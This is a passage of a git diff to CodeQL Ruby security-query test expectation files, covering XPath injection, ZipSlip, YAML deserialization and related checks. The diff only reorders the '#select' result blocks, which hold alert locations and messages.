"//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | edges | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | provenance | AdditionalTaintStep | | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | provenance | AdditionalTaintStep | @@ -47,3 +36,14 @@ nodes | RexmlInjection.rb:27:40:27:50 | "//#{...}" | semmle.label | "//#{...}" | | RexmlInjection.rb:35:28:35:38 | "//#{...}" | semmle.label | "//#{...}" | subpaths +#select +| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:41:15:41:25 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected index 926568e388d6..65ffe942e84d 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected @@ -1,10 +1,3 @@ -#select -| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | -| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | -| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | -| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | -| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | -| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | edges | zip_slip.rb:8:5:8:11 | tarfile | zip_slip.rb:9:5:9:11 | tarfile | provenance | | | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:8:5:8:11 | tarfile | provenance | | @@ -78,3 +71,10 @@ nodes | zip_slip.rb:125:22:125:36 | call to full_name | semmle.label | call to full_name | | zip_slip.rb:126:21:126:30 | entry_path | semmle.label | entry_path | subpaths +#select +| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | +| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | +| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | +| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | +| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | +| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected index 0cfb19a43619..0fa5f9158300 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected +++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected @@ -1,18 +1,3 @@ -#select -| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | edges | UnsafeYamlDeserialization.rb:10:5:10:13 | yaml_data | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | provenance | | | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:10:17:10:28 | ...[...] | provenance | | @@ -54,3 +39,18 @@ nodes | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | semmle.label | call to gets | | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | semmle.label | call to readlines | subpaths +#select +| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected index b4dc532a38b3..e0e85b75ebbe 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected @@ -1,11 +1,3 @@ -#select -| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | edges | ManuallyCheckHttpVerb.rb:11:5:11:10 | method | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | provenance | | | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:11:14:11:42 | ...[...] | provenance | | @@ -40,3 +32,11 @@ nodes | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | semmle.label | call to env | | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | semmle.label | ...[...] | subpaths +#select +| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected index 6dd6637abd4d..4f72a24cee77 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected @@ -1,8 +1,3 @@ -#select -| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | edges | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | provenance | | | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | provenance | | @@ -18,3 +13,8 @@ nodes | WeakParams.rb:20:28:20:38 | call to GET | semmle.label | call to GET | | WeakParams.rb:20:28:20:44 | ...[...] | semmle.label | ...[...] | subpaths +#select +| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected index 94cdef1f29be..4032d044fd86 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected @@ -1,7 +1,3 @@ -#select -| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | edges | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | provenance | | | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | provenance | | @@ -14,3 +10,7 @@ nodes | impl/miss-anchor.rb:14:12:14:15 | name | semmle.label | name | | 